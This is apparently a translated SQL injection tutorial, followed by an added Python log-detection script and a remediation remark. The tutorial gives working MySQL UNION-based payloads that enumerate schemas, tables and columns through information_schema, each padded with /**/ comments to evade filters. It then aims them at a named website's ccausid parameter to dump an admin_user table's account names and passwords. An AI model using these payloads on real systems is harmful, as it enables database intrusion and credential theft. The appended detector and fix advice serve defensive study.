Enumerate databases
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*

Enumerate tables
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=<hex value of the database name>/**/limit/**/1,1

Enumerate columns
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=<hex value of the table name>/**/limit/**/1,1

MySQL 5 advanced injection method: dumping tables

Example:

1. Dump table names
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574 is the hex encoding of the database name yd_teamnet)
Stepping through the results this way, the admin_user table appeared at the 4th one.

2. Dump column names
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

3. Dump passwords
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
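
Added example, not part of the original post: a log-side check for the information_schema enumeration requests shown in steps 1 and 2. It URL-decodes each request, removes the /**/ comment padding, flags UNION SELECT against the catalog views, and decodes 0x literals so an analyst can see which schema or table was probed. The sample requests, paths and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request lines (not real logs); paths are placeholders.
SAMPLE_REQUESTS = [
    "/item.php?id=13/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/"
    "information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*",
    "/item.php?id=13%20UNION%20SELECT%201,COLUMN_NAME,3%20FROM%20information_schema.COLUMNS"
    "%20WHERE%20TABLE_NAME=0x61646D696E5F75736572",
    "/search.php?q=student+union+select+committee",  # benign: no catalog reference
    "/item.php?id=42",
]

COMMENT = re.compile(r"/\*.*?(\*/|$)", re.S)  # closed /**/ or an unterminated trailing /*
UNION_SELECT = re.compile(r"\bunion\s+(all\s+)?select\b")
CATALOG = re.compile(r"\binformation_schema\s*\.\s*(schemata|tables|columns)\b")
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b")


def normalize(request):
    """URL-decode, turn SQL comments into spaces, collapse whitespace, lowercase."""
    text = COMMENT.sub(" ", unquote_plus(request))
    return re.sub(r"\s+", " ", text).lower()


def inspect(request):
    """Return None for a clean request, else details of the enumeration attempt."""
    text = normalize(request)
    catalog = CATALOG.search(text)
    if not (UNION_SELECT.search(text) and catalog):
        return None
    decoded = []
    for match in HEX_LITERAL.finditer(text):
        # Hex literals hide quoted names; decode them for triage.
        raw = bytes.fromhex(match.group(1))
        decoded.append(raw.decode("utf-8", errors="replace"))
    return {"catalog_view": catalog.group(1), "hex_strings": decoded}


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(inspect(line), "<-", line[:60])
```

The rule only covers the catalog enumeration steps; the final step reads the application table directly, so parameterized queries and a database account without read access to unrelated tables remain the actual fix.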